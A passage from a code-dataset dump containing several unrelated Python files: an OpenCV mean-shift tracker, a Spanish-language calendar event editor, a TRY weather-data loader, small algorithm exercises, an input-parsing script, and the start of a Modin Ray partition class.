(current_x[i], current_y[i], width, height)\n tracking_region = image[current_y[i]:current_y[i] + height, current_x[i]:current_x[i] + width]\n mask = cv2.inRange(tracking_region, np.array((0.0, 0.0, 0.0)), np.array((180.0, 180.0, 180.0)))\n tracking_region_hist = cv2.calcHist([tracking_region], [0], mask, [9], [0, 180])\n cv2.normalize(tracking_region_hist, tracking_region_hist, 0, 255, cv2.NORM_MINMAX)\n\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n back_propagation = cv2.calcBackProject([hsv_image], [0], tracking_region_hist, [0, 180], 1)\n ret, track_window = cv2.meanShift(back_propagation, track_window, termination_parameters)\n current_x[i] = track_window[0]\n current_y[i] = track_window[1]\n draw(track_window, image, (0, 255, 0))\n\n # Display the resulting frame\n cv2.imshow(windowName, image)\n\n inputKey = cv2.waitKey(waitTime) & 0xFF\n if inputKey == ord('q'):\n break\n elif inputKey == ord('t'):\n isTracking = not isTracking\n\n print(\"FPS: \", 1.0 / (time.time() - start_time))\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\n\nprint('Starting program')\nif __name__ == '__main__':\n arglist = sys.argv\n src = 0\n print('Argument count is ', len(arglist))\n if len(arglist) == 2:\n src = arglist[1]\n else:\n src = 0\n captureVideo(src)\nelse:\n print('Not in main')\n","sub_path":"openCV/extral/mean-shift-particle-filter-tracker/MeanShiftVector.py","file_name":"MeanShiftVector.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98610713","text":"from collections import namedtuple\nfrom datetime import datetime as Fecha\nfrom Bandeja_de_Entrada import es_numero, resumen_destinatarios\nfrom Correo import dudas_input, imprimir_mensaje\nfrom calendar import Calendar\nfrom Correo import error_destinatarios\n\ndef transformar_fecha_inverso(fecha):\n return f\"{fecha.year}-{cero(fecha.month)}-{cero(fecha.day)} \" \\\n f\"{cero(fecha.hour)}:{cero(fecha.minute)}:{cero(fecha.second)}\"\n\ndef archivo_perteneciente(evento):\n with open(\"data/db_events.csv\", encoding=\"utf-8\") as archivo:\n i = 0\n fecha_i, fecha_f = map(transformar_fecha_inverso, [evento.fecha_i,\n evento.fecha_f])\n for linea in archivo:\n\n if \",\".join([evento.propietario, f\"'{evento.nombre}'\", fecha_i,\n fecha_f, f\"'{evento.descripcion}'\"]) in linea.strip():\n return f\"0{i}\"\n i += 1\n with open(\"datos/eventos.csv\", encoding=\"utf-8\") as archivo:\n i = 0\n for linea in archivo:\n if \",\".join([evento.propietario, f\"'{evento.nombre}'\", fecha_i,\n fecha_f, f\"'{evento.descripcion}'\"]) in linea.strip():\n return f\"1{i}\"\n i += 1\n\ndef transformar_fecha(fecha, orden=False):\n fecha = fecha.strip()\n if orden:\n j = [6, -2, -8]\n else:\n j = [0 for i in range(3)]\n año = int(fecha[j[0]:4+j[0]])\n mes = int(fecha[5+j[1]:7+j[1]])\n dia = int(fecha[8+j[2]:10+j[2]])\n if len(fecha) == 10:\n return Fecha(año, mes, dia)\n hora = int(fecha[11:13])\n min = int(fecha[14:16])\n seg = int(fecha[17:19])\n return Fecha(año, mes, dia, hora, min, seg)\n\ndef generar_id(lista):\n propietario = lista[0]\n nombre = lista[1]\n fecha_i = lista[2]\n fecha_f = lista[3]\n id = fecha_i.replace(\"-\",\"\").replace(\":\",\"\").replace(\" \",\"\")\n id += fecha_f.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\")\n id += nombre\n id += propietario\n return id\n\nEvento = namedtuple(\"Evento\", [\"propietario\", \"nombre\", \"fecha_i\",\n \"fecha_f\", \"descripcion\", \"invitados\",\n \"etiquetas\", \"id\"])\n\ndef obtener_eventos():\n archivo = open(\"./data/db_events.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()[1:]\n archivo.close()\n archivo = open(\"./datos/eventos.csv\", \"r\", encoding=\"utf-8\")\n lista_datos.extend(archivo.readlines()[1:])\n archivo.close()\n datos = []\n\n for i in range(len(lista_datos)):\n indice_1 = lista_datos[i].find(\"'\")\n indice_2 = lista_datos[i][indice_1+1:].find(\"'\") + indice_1 + 1\n indice_4 = lista_datos[i].rfind(\"'\")\n indice_3 = lista_datos[i][indice_2+1:indice_4].find(\"'\") + indice_2 + 1\n lista = lista_datos[i][:indice_1 - 1].split(\",\")\n lista.append(lista_datos[i][indice_1 + 1:indice_2])\n lista.extend((lista_datos[i][indice_2 + 2:indice_3 - 1]).split(\",\"))\n lista.append(lista_datos[i][indice_3 + 1:indice_4])\n lista.extend(lista_datos[i][indice_4 + 2:].strip().split(\",\"))\n lista.append(generar_id(lista))\n lista[2] = transformar_fecha(lista[2])\n lista[3] = transformar_fecha(lista[3])\n #lista[5] = set(lista[5].split(\";\"))\n #lista[6] = set(lista[6].split(\";\"))\n datos.append(Evento(lista[0], lista[1], lista[2], lista[3], lista[4],\n lista[5], lista[6], lista[7]))\n #datos = sorted(datos, key=ordenar_eventos)\n return datos\n\ndef fechas_coinciden(fecha, fecha_i, fecha_f): #DLKJDÑLKJDLK\n fecha = fecha.lower()\n meses_escritos = \"enero.febrero.marzo.abril.mayo.junio.agosto.septiembre\" \\\n \".octubre.noviembre.diciembre\".split(\".\")\n meses_ingles = \"january.february.march.april.may.june.july.august\" \\\n \".september.october.november.december\".split(\".\")\n\ndef error_fecha(fecha):\n if fecha == \"\":\n return True\n fecha = fecha.lower().strip()\n numeros = list(\"0123456789\")\n if len(fecha) != 10 and len(fecha) != 19:\n return False\n for i in range(10):\n if i in [0, 1, 3, 4, 6, 7, 8, 9, 11, 12, 14, 15, 17, 18]:\n if fecha[i] not in numeros:\n return False\n elif i == 10 and fecha[i] != \" \":\n return False\n elif i in [2, 5] and fecha[i] != \"-\":\n return False\n elif i in [13, 16] and fecha[i] != \":\":\n return False\n j = [6, -2, -8]\n año = int(fecha[6:10])\n mes = int(fecha[3:5])\n dia = int(fecha[0:2])\n if mes > 12:\n return False\n lista_dias = list(Calendar().itermonthdays(año, mes))\n if dia > max(lista_dias):\n return False\n if len(fecha) == 10:\n return True\n hora = int(fecha[11:13])\n min = int(fecha[14:16])\n seg = int(fecha[17:19])\n if hora > 23 or min > 59 or seg > 59:\n return False\n return True\n\ndef ordenar_eventos(evento):\n return evento.id\n\ndef buscar_fecha(mes, fecha):\n dias = \"Lunes,Martes,Miércoles,Jueves,Viernes,Sábado,Domingo\".split(\",\")\n for semana in mes:\n for dia in semana:\n if fecha == dia[0]:\n return dias[dia[1]]\ndef cero(fecha):\n if len(str(fecha)) == 1:\n return f\"0{str(fecha)}\"\n return str(fecha)\n\ndef mostrar_fecha(fecha_i, fecha_f):\n meses = \"enero,febrero,marzo,abril,mayo,junio,agosto,septiembre,octubre,\" \\\n \"noviembre,diciembre\".split(\",\")\n if fecha_i.date() == fecha_f.date():\n if Fecha.today().year == fecha_i.day:\n año = \"\"\n else:\n año = f\" de {fecha_i.year}\"\n calendario_mes = Calendar().monthdays2calendar(fecha_i.year,\n fecha_i.month)\n dia = buscar_fecha(calendario_mes, fecha_i.day)\n return f\"{dia}, {fecha_i.day} de {meses[fecha_i.month]}\" \\\n f\"{año}\\n{cero(fecha_i.hour)}:{cero(fecha_i.minute)}:\" \\\n f\"{cero(fecha_i.second)} - \" \\\n f\"{cero(fecha_f.hour)}:{cero(fecha_f.minute)}:\" \\\n f\"{cero(fecha_f.second)}\"\n else:\n return f\"{fecha_i.day} de {meses[fecha_i.month]} de \" \\\n f\"{fecha_i.year}, \" \\\n f\"{cero(fecha_i.hour)}:{cero(fecha_i.minute)}:\" \\\n f\"{cero(fecha_i.second)} - \" \\\n f\"{fecha_f.day} de {meses[fecha_f.month]} de \" \\\n f\"{fecha_f.year}, \" \\\n f\"{cero(fecha_f.hour)}:{cero(fecha_f.minute)}:\" \\\n f\"{cero(fecha_f.second)}\"\n\ndef modificar_evento_editor(evento, opcion):\n usuario = evento.propietario\n nombre = evento.nombre\n fecha_i = evento.fecha_i\n fecha_f = evento.fecha_f\n descripcion = evento.descripcion\n invitados = evento.invitados\n etiquetas = evento.etiquetas\n while opcion != \"\":\n print(\"[0] Modificar Nombre\")\n print(\"[1] Modificar Fecha de Inicio\")\n print(\"[2] Modificar Fecha de Cierre\")\n print(\"[3] Modificar Descripción\")\n print(\"[4] Modificar Etiquetas\")\n print(\"[Enter] para volver\")\n opcion = input()\n while opcion not in [\"0\", \"1\", \"2\", \"3\", \"4\", \"\"]:\n opcion = dudas_input()\n if opcion == \"0\":\n print(\"_\" * 80)\n print(\"| Nombre\")\n nombre = input(\"| \")\n while len(nombre) > 50 or len(nombre) < 6:\n nombre = dudas_caracteres(\"Nombre del Evento\", 50, nombre, 6)\n print(\"_\" * 80)\n elif opcion == \"1\":\n print(\"_\"*80)\n fecha_i = input(\"| Desde: \")\n while not error_fecha(fecha_i):\n print(\n \"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\n \"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para utilizar \"\n \"la fecha actual\")\n fecha_i = input(\"| Fecha de inicio (DD-MM-AAAA): \")\n if fecha_i == \"\":\n fecha_i = Fecha.today()\n if not type(fecha_i) == Fecha:\n fecha_i = transformar_fecha(fecha_i, True)\n print(\"_\"*80)\n elif opcion == \"2\":\n print(\"_\"*80)\n fecha_f = input(\"| Hasta: \")\n while not error_fecha(fecha_f) or not comparar_fechas(fecha_i,\n fecha_f):\n if not error_fecha(fecha_f):\n print(\n \"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\n \"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para \"\n \"utilizar \"\n \"la fecha correspondiente a una hora después de la inicial\")\n if not comparar_fechas(fecha_i, fecha_f):\n print(\n \"Lo sentimos, la fecha de cierre debe ocurrir después que \"\n \"la de inicio.\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para \"\n \"utilizar la fecha correspondiente a una hora después de la \"\n \"inicial\")\n fecha_f = input(\"| Fecha de cierre (DD-MM-AAAA): \")\n if fecha_f == \"\":\n fecha_f = fecha_i + timedelta(hours=1)\n if not type(fecha_f) == Fecha:\n fecha_f = transformar_fecha(fecha_f, True)\n print(\"_\"*80)\n elif opcion == \"3\":\n print(\"_\"*80)\n print(\"| Descripción\")\n descripcion = input(\"| \")\n if descripcion == \"\":\n descripcion = \"sin descripcion\"\n print(\"_\"*80)\n elif opcion == \"4\":\n print(\"_\"*80)\n print(\"| Etiquetas (separadas por coma)\")\n etiquetas = (\";\").join(input(\"| \").split(\",\"))\n if etiquetas == \"\":\n etiquetas = \"sin etiquetas\"\n print(\"_\"*80)\n else:\n continue\n if type(fecha_i) == Fecha:\n fecha_i_i, fecha_f_i = map(transformar_fecha_inverso,\n [fecha_i, fecha_f])\n else:\n fecha_i_i, fecha_f_i = fecha_i, fecha_f\n fecha_i, fecha_f = map(transformar_fecha,\n [fecha_i, fecha_f])\n evento_actual = Evento(usuario, nombre, fecha_i, fecha_f, descripcion,\n invitados, etiquetas,\n generar_id([usuario, nombre,\n fecha_i_i, fecha_f_i]))\n mostrar_info_evento(evento_actual, False, True)\n print(\"¿Desea realizar algún cambio?\")\n return usuario, nombre, fecha_i, fecha_f, descripcion, invitados, etiquetas\ndef editar_evento(evento):\n print(\"_\"*80)\n print(\"Editor de Eventos\")\n print(\"_\"*80)\n print(\"A continuación se presentan las acciones disponibles del editor\")\n print(\"[0] Volver a Resultados de la búsqueda\")\n print(\"[1] Editar atributos del evento\")\n print(\"[2] Eliminar evento\")\n print(\"[3] Agregar invitados\")\n print(\"[Enter] Volver al Menú\")\n opcion = input().lower()\n while opcion not in [\"0\", \"1\", \"2\", \"3\", \"\"]:\n print(\"Lo sentimos, estamos teniendo dificultades para entender tu \"\n \"respuesta\")\n print(\"Por favor, inténtelo de nuevo :D\")\n opcion = input().lower()\n if opcion in [\"1\", \"2\", \"3\"]:\n ubicacion = archivo_perteneciente(evento)\n file = int(ubicacion[0])\n indice = int(ubicacion[1])\n if file == 0:\n archivo = open(\"data/db_events.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()\n archivo.close()\n archivo = open(\"data/db_events.csv\", \"w\", encoding=\"utf-8\")\n elif file == 1:\n archivo = open(\"./datos/eventos.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()\n archivo.close()\n archivo = open(\"./datos/eventos.csv\", \"w\", encoding=\"utf-8\")\n if opcion == \"1\":\n mostrar_info_evento(evento, False, True)\n opcion = \"0\"\n usuario, nombre, fecha_i, fecha_f, descripcion, invitados, \\\n etiquetas = modificar_evento_editor(evento, opcion)\n if type(fecha_i) == Fecha:\n fecha_i, fecha_f = map(transformar_fecha_inverso, [fecha_i,\n fecha_f])\n lista_a_unir = [usuario, f\"'{nombre}'\", fecha_i, fecha_f,\n f\"'{descripcion}'\", invitados, etiquetas]\n lista_datos[indice] = \",\".join(lista_a_unir) + \"\\n\"\n elif opcion == \"2\":\n lista_datos.pop(indice)\n elif opcion == \"3\":\n print(\"A continuación puede agregar invitados\")\n print(\"| Invitados (separados por coma, en caso de ser más de uno)\")\n invitados = input(\"| \")\n if invitados == \"\":\n invitados = \"sin invitados\"\n else:\n invitados = \";\".join(error_destinatarios(invitados))\n if \"sin invitados\" in lista_datos[indice]:\n lista_datos[indice] = lista_datos[indice].replace(\"sin \"\n \"invitados\", invitados)\n if invitados != \"sin invitados\":\n indice_coma = lista_datos[indice].rfind(\",\")\n lista_datos[indice] = lista_datos[indice][:indice_coma] + \\\n \";\" + invitados + lista_datos[indice][\n indice_coma:]\n else:\n pass\n datos = \"\".join(lista_datos) + \"\\n\"\n archivo.write(datos)\n archivo.close()\n\ndef mostrar_info_evento(evento, crear_evento=False, editor=False, usuario=\"\"):\n print(\"_\"*80)\n print(evento.nombre)\n print(imprimir_mensaje(mostrar_fecha(evento.fecha_i, evento.fecha_f)))\n print(\"-\"*80)\n print(\"Creado por: \" + evento.propietario)\n if crear_evento:\n print(imprimir_mensaje(\"Invitados: \" +\n \", \".join(evento.invitados.split(\";\"))))\n elif editor:\n pass\n else:\n mas_invitados = resumen_destinatarios(evento.invitados.split(\";\"),\n \"invitados\")\n print(\"-\"*80)\n print(imprimir_mensaje(evento.descripcion))\n print(\"-\"*80)\n print(imprimir_mensaje(\"Etiquetas: \" +\n \", \".join(evento.etiquetas.split(\";\"))))\n print(\"_\"*80)\n if crear_evento or editor:\n return \"\"\n if mas_invitados:\n print(\"[0] Mostrar lista de invitados completa\")\n print(\"[1] Volver al Menú\")\n if usuario == evento.propietario:\n print(\"[2] Editar Evento\")\n print(\"[Enter] para volver a los Resultados de Búsqueda\")\n opcion = input().strip()\n while not opcion in [\"0\", \"1\", \"\", \"2\"]:\n opcion = dudas_input()\n if opcion == \"0\":\n print(imprimir_mensaje(\", \".join(evento.invitados.split(\";\")), \",\"))\n print(\"[1] Volver al Menú\")\n print(\"[2] Editar evento\")\n print(\"[Enter] para volver a los Resultados de Búsqueda\")\n opcion = input().strip()\n while not opcion in [\"1\", \"\", \"2\"]:\n opcion = dudas_input()\n if opcion == \"2\":\n editar_evento(evento)\n return \"menu\"\n if opcion == \"1\":\n return \"menu\"\n if opcion == \"\":\n return \"volver\"\n else:\n return \"volver\"\n\ndef mostrar_eventos(datos, buscador=False, usuario=\"\"):\n if len(datos) == 0:\n print(\"Lo sentimos, no encontramos eventos que coincidan con la \"\n \"búsqueda\")\n print(\"Por favor, inténtelo de nuevo :D\")\n return \"menu\"\n repetir = True\n while repetir:\n if buscador:\n print(\"-\"*80)\n print(\"Resultados de búsqueda\")\n print(\"-\"*80)\n for evento in enumerate(datos):\n print(\"| [\" + str(evento[0] + 1) + \"] \" + evento[1].nombre)\n print(\"-\"*80)\n print(\"Ingrese el {numero} del evento que desea revisar: \")\n print(\"[0] para realizar otra búsqueda\")\n print(\"[Enter] para volver al Menú\")\n numero = input()\n while not es_numero(numero, len(datos)):\n if numero == \"\":\n continue\n numero = dudas_input()\n if numero == \"\":\n return \"menu\"\n opcion = mostrar_info_evento(datos[int(numero) - 1], usuario=usuario)\n if opcion == \"volver\":\n repetir = True\n elif opcion == \"menu\":\n return opcion\n\n\n\ndef buscador_evento(datos, usuario):\n repetir = True\n while repetir:\n print(\"_\"*80)\n print(\"Buscador de Eventos\")\n print(\"_\"*80)\n print(\"Se presentarán los campos de intervalo de tiempo, nombre y \"\n \"etiquetas.\")\n print(\"Puede escribir los filtros a continuación\")\n print(\"Presione [Enter] si prefiere no especificar un campo\")\n fecha_i = input(\"Fecha de inicio: \").lower()\n while not error_fecha(fecha_i):\n print(\"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\"Por favor, inténtelo de nuevo, o presione ENTER para saltar \"\n \"este paso\")\n fecha_i = input(\"Fecha de inicio (DD-MM-AAAA): \").lower()\n fecha_f = input(\"Fecha de cierre: \").lower()\n while not error_fecha(fecha_f):\n print(\"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\"El formato de fecha que soportamos es DD-MM-AAAA\")\n print(\"Por ejemplo: 01-08-2018\")\n print(\"Por favor, inténtelo de nuevo, o presione ENTER para saltar \"\n \"este paso\")\n fecha_i = input(\"Fecha de cierre (DD-MM-AAAA): \").lower()\n\n nombre = input(\"Nombre: \").lower()\n etiquetas = input(\"Etiquetas (separadas por coma): \").lower().split(\",\")\n listo_fi, listo_ff, listo_nombre, listo_etiquetas = [False for i in\n range(4)]\n fecha_i_set, fecha_f_set, nombre_set, etiquetas_set = [set() for i in\n range(4)]\n if fecha_i == \"\":\n listo_fi = True\n fecha_i_set = set(datos)\n else:\n fecha_i= transformar_fecha(fecha_i, True)\n if fecha_f == \"\":\n listo_ff = True\n fecha_f_set = set(datos)\n else:\n fecha_f = transformar_fecha(fecha_f, True)\n if nombre == \"\":\n listo_nombre = True\n nombre_set = set(datos)\n if etiquetas == [\"\"]:\n listo_etiquetas = True\n etiquetas_set = set(datos)\n listo_todo = False\n if listo_etiquetas and listo_ff and listo_fi and listo_nombre:\n listo_todo = True\n resultado_busqueda = set()\n for evento in datos:\n if usuario == evento.propietario or usuario in \\\n evento.invitados.split(\";\"):\n if listo_todo:\n resultado_busqueda.add(evento)\n else:\n if not listo_fi and evento.fecha_i >= fecha_i:\n fecha_i_set.add(evento)\n if not listo_ff and evento.fecha_f <= fecha_i:\n fecha_f_set.add(evento)\n if not listo_nombre and nombre in evento.nombre.lower():\n nombre_set.add(evento)\n if not listo_etiquetas:\n etiqueta_encontrada = False\n for etiquetas_de_evento in evento.etiquetas.split(\";\"):\n if etiqueta_encontrada:\n continue\n for etiqueta_buscada in etiquetas:\n if etiqueta_encontrada:\n continue\n if etiqueta_buscada.strip() in etiquetas_de_evento.lower():\n etiqueta_encontrada = True\n if etiqueta_encontrada:\n etiquetas_set.add(evento)\n if not listo_todo:\n resultado_busqueda = fecha_i_set & fecha_f_set & \\\n nombre_set & etiquetas_set\n resultado_busqueda = sorted(list(resultado_busqueda), key=ordenar_eventos)\n opcion = mostrar_eventos(resultado_busqueda, True, usuario)\n if opcion == \"menu\":\n repetir = False\n elif opcion == \"volver\":\n repetir = True\n\n\n","sub_path":"Tareas/T00/Calendario.py","file_name":"Calendario.py","file_ext":"py","file_size_in_byte":21225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445424391","text":"# -*- coding: UTF-8 -*-\n\n\n\n\"\"\"\ndownload and extract TRY-dataset from\nhttp://www.irbnet.de/daten/baufo/20118035316/TRY2011_Datensatz.zip\n\"\"\"\n\n\nimport os\nimport codecs\n\nTRY_COLUMNS = [(\"region\", int, None),\n (\"station\", int, None),\n (\"month\", int, None),\n (\"day\", int, None),\n (\"hour\", int, None),\n (\"coverage\", int, \"1/8\"),\n (\"wind_direction\", int, \"deg\"),\n (\"wind_speed\", float, \"m/s\"),\n (\"air_temperature\", float, \"degC\"),\n (\"air_pressure\", float, \"hPa\"),\n (\"water_vapour\", float, \"g/kg\"),\n (\"rel_humidity\", int, \"%\"),\n (\"weather\", int, None),\n (\"dir_radiation\", int, \"W/m2\"),\n (\"diff_radiation\", int, \"W/m2\"),\n (\"radiation_info\", int, None),\n (\"atm_irradiance\", int, \"W/m2\"),\n (\"terr_irradiance\", int, \"W/m2\"),\n (\"irradiance_quality\", int, None)]\n \n\nTRY_COLUMNNAMES = [x[0] for x in TRY_COLUMNS]\nTRY_DTYPES = [x[1] for x in TRY_COLUMNS]\nTRY_UNITS = [x[2] for x in TRY_COLUMNS]\n \nTRY_YTYPE = dict(Wint=0, Jahr=1, Somm=2)\n\nMO_FORMATSTR = [\"\\t%d\\t\" + {int:\"%d\", float:\"%f\"}[dtype] for dtype in TRY_DTYPES]\n\ndef load_try(path, with_hoy=True):\n \"\"\" returns \n \"\"\"\n f = codecs.open(filename=path, mode=\"r\", encoding=\"latin-1\")\n lines = f.readlines()\n f.close()\n result = []\n start = False\n for line in lines:\n if not(start):\n start = line.startswith(\"***\")\n continue\n line = line.strip()\n cells = line.split(\" \")\n cells = [cell for cell in cells if cell]\n row = [TRY_DTYPES[i](cells[i]) for i in range(19)]\n assert len(cells) == 19\n result.append(row)\n \n assert len(result) == 8760\n if with_hoy:\n result = [[i] + result[i] for i in range(8760)]\n return result\n\ndef load_try_da(path):\n data = load_try(path, with_hoy=False)\n res = dict.fromkeys(TRY_COLUMNNAMES)\n for i in range(len(TRY_COLUMNNAMES)):\n res[TRY_COLUMNNAMES[i]] = [data[j][i] for j in range(8760)]\n return res\n \ndef write_tt(trydata, basedir):\n \"\"\" writes modelica conform timetable text file \"\"\"\n for i in range(len(TRY_COLUMNS)):\n s = \"#1\\n\"\n s += \"\\ndouble %s(8760, 2)\\n\" % TRY_COLUMNS[i]\n s += \"\\n\".join([MO_FORMATSTR[i] % (row[0], row[i+1]) for row in trydata])\n filename = \"%s.txt\" % TRY_COLUMNS[i]\n path = os.path.join(basedir, filename) \n f = open(path, \"w+t\")\n f.write(s)\n f.close()\n \ndef try2mo(src_path, dest_path):\n trydata = load_try(src_path)\n write_tt(trydata, dest_path)\n \n### TEST\n\ndef test():\n pass\n\nif __name__ == \"__main__\":\n test()","sub_path":"plx/sci/meteo/dwdtry/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"363943028","text":"def f(n):\n assert n >= 0\n answer = 1\n while n > 1:\n answer *= n\n n -= 1\n return answer\n\n\ndef fact(n):\n assert n >= 0\n if n <= 1:\n return\n else:\n return n * fact(n - 1)\n\n\ndef g(n):\n x = 0\n for i in range(n):\n for j in range(n):\n x += 1\n return x\n\n\ndef h(x):\n assert type(x) == int and x >= 0\n answer = 0\n s = str(x)\n for c in s:\n answer += int(c)\n return answer\n\n\nprint(f(1))\nprint(fact(1))\nprint(g(1))\nprint(h(1))\n","sub_path":"mitAlgorithms.py","file_name":"mitAlgorithms.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79737697","text":"\nimport sys\n\nclass BadInputError(Exception): pass\n\ndef getCommandSet(s, char, p=False):\n return set(','.join(c1+c2 if p else ','.join((c1, c1+c2)) \n for c1, c2 in zip(s, char*len(s))).split(','))\n\ncommandsSet = getCommandSet(\"mftd\", 'a')\n\ndef anySetter(*conds, seq=None):\n return any((len(txt) == conds[0] if type(conds[0]) == int \n else len(txt) == txt.count(conds[0])) if len(conds) == 1 \n else len(txt) in {txt.count(ch) for ch in conds[1]} for txt in seq)\n\ndef inputChecker(msg, seq=commandsSet):\n inpt = input(msg)\n if len(inpt) in {inpt.count(c) for c in \"bde\"}:\n seq = seq | {c*len(inpt) for c in \"bde\"}\n if inpt not in seq:\n print(\"\\nERROR: Bad Input!\")\n return inputChecker(msg, seq)\n return inpt \n\ndef getInputs(*args):\n all_data, inType, table, inData, msg, num, lastIn = args\n all_ins = [] if not all_data else all_data\n if len(all_ins) == 0 or any(d in {'del', 'b'} for d in (inType, table, inData)):\n print(\"\\n\\n{} \\nb = step back \\nd*N = delete \\npress ENTER to cancel\".format(msg))\n while True:\n if not inType:\n inType = inputChecker('\\n'+\"INPUT\"+'\\n'+\"manually(m/all=ma)\"+'\\n'+\" file(f/all=fa): \")\n lastIn = inType\n \n avalSettings = [d for d in (inType, table, inData) if d is not None]\n if anySetter(0, \"de\", seq=avalSettings):\n num -= 1\n break\n if anySetter('b', seq=avalSettings):\n return getInputs(all_ins, None, None, None, '', num-1, None)\n \n ((all_ins if any(inData==c for c in (None, 'del')) else all_ins.append(inData)) \n if avalSettings[-1] != 'da' else print(\"0 INPUTS\", all_ins.clear()))\n print(all_ins, num)\n \n if table in getCommandSet('tx', 'a'):\n table = None if table in \"tx\" else table\n inData = input(\"Paste Dataset: \" if inType in {'m', 'ma'} else \"Fname: \")\n inType = None if inType not in getCommandSet(\"mf\", 'a', p=True) else inType\n return getInputs(all_ins, inType, table, inData, msg, num+1, inData)\n else:\n table = inputChecker(\"Table?(t, ta): \", seq=getCommandSet('tx', 'a'))\n return getInputs(all_ins, inType, table if len(table) > 0 else 'x', None, '', num, table)\n \n if inType in {'f', 'fa'}:\n with open(inData, 'r', encoding='utf8') as fi:\n inData = fi.readlines() if input(\"Table(t)?: \") == 't' else fi.read()\n\n if len(all_ins) == 0 or any(len(d)==d.count('e') for d in avalSettings if len(d)>0):\n num = 0 if len(all_ins) == 0 else num\n getInputs(all_ins, None, None, None, '', num, lastIn) if input(\"No data, exit?: \" \n if lastIn != 'e' else \"Exit?: \").lower() != \"y\" else sys.exit()\n \n if len(lastIn) > 0 and lastIn.count('d') == len(lastIn):\n n = len(lastIn) if len(lastIn) <= len(all_ins) else len(all_ins)\n i = 0\n while i < n:\n del all_ins[-1]\n i += 1\n return getInputs(all_ins, inType, table, 'del', \"\\ndeleted {} dataset{}\".format(\n n, '' if n == 1 else 's'), num-n, lastIn)\n if len(lastIn) == 0:\n return all_ins\n\n\nclass Datas: \n\n def __init__(self, all_data=getInputs(*[None for i in range(5)], 0, None)):\n self.all_ins = all_data\n self.data_Nsets = len(self.all_ins)\n \n def printAll(self):\n print(\"\\n\\nall data\\n{}\\n\\nnumber of datasets\\n{}\\n\".\n format(self.all_ins, self.data_Nsets))\n \n def compareDatasets(self):\n for dataset in self.all_ins:\n print(dataset)\n print(len(dataset))\n\nx = Datas()\nx.printAll()\nx.compareDatasets()\n","sub_path":"P1_v3.py","file_name":"P1_v3.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"54346519","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n\"\"\"Module houses class that wraps data (block partition) and its metadata.\"\"\"\n\nimport pandas\n\nfrom modin.data_management.utils import length_fn_pandas, width_fn_pandas\nfrom modin.engines.base.frame.partition import PandasFramePartition\nfrom modin.pandas.indexing import compute_sliced_len\n\nimport ray\nfrom ray.services import get_node_ip_address\nfrom packaging import version\n\nObjectIDType = ray.ObjectRef\nif version.parse(ray.__version__) >= version.parse(\"1.2.0\"):\n from ray.util.client.common import ClientObjectRef\n\n ObjectIDType = (ray.ObjectRef, ClientObjectRef)\n\ncompute_sliced_len = ray.remote(compute_sliced_len)\n\n\nclass PandasOnRayFramePartition(PandasFramePartition):\n \"\"\"\n The class implements the interface in ``PandasFramePartition``.\n\n Parameters\n ----------\n object_id : ray.ObjectRef\n A reference to ``pandas.DataFrame`` that need to be wrapped with this class.\n length : ray.ObjectRef or int, optional\n Length or reference to it of wrapped ``pandas.DataFrame``.\n width : ray.ObjectRef or int, optional\n Width or reference to it of wrapped ``pandas.DataFrame``.\n ip : ray.ObjectRef or str, optional\n Node IP address or reference to it that holds wrapped ``pandas.DataFrame``.\n call_queue : list\n Call queue that needs to be executed on wrapped ``pandas.DataFrame``.\n \"\"\"\n\n def __init__(self, object_id, length=None, width=None, ip=None, call_queue=None):\n assert isinstance(object_id, ObjectIDType)\n\n self.oid = object_id\n if call_queue is None:\n call_queue = []\n self.call_queue = call_queue\n self._length_cache = length\n self._width_cache = width\n self._ip_cache = ip\n\n def get(self):\n \"\"\"\n Get the object wrapped by this partition out of the Plasma store.\n\n Returns\n -------\n pandas.DataFrame\n The object from the Plasma store.\n \"\"\"\n if len(self.call_queue):\n self.drain_call_queue()\n return ray.get(self.oid)\n\n def apply(self, func, *args, **kwargs):\n \"\"\"\n Apply a function to the object wrapped by this partition.\n\n Parameters\n ----------\n func : callable or ray.ObjectRef\n A function to apply.\n *args : iterable\n Additional positional arguments to be passed in `func`.\n **kwargs : dict\n Additional keyword arguments to be passed in `func`.\n\n Returns\n -------\n 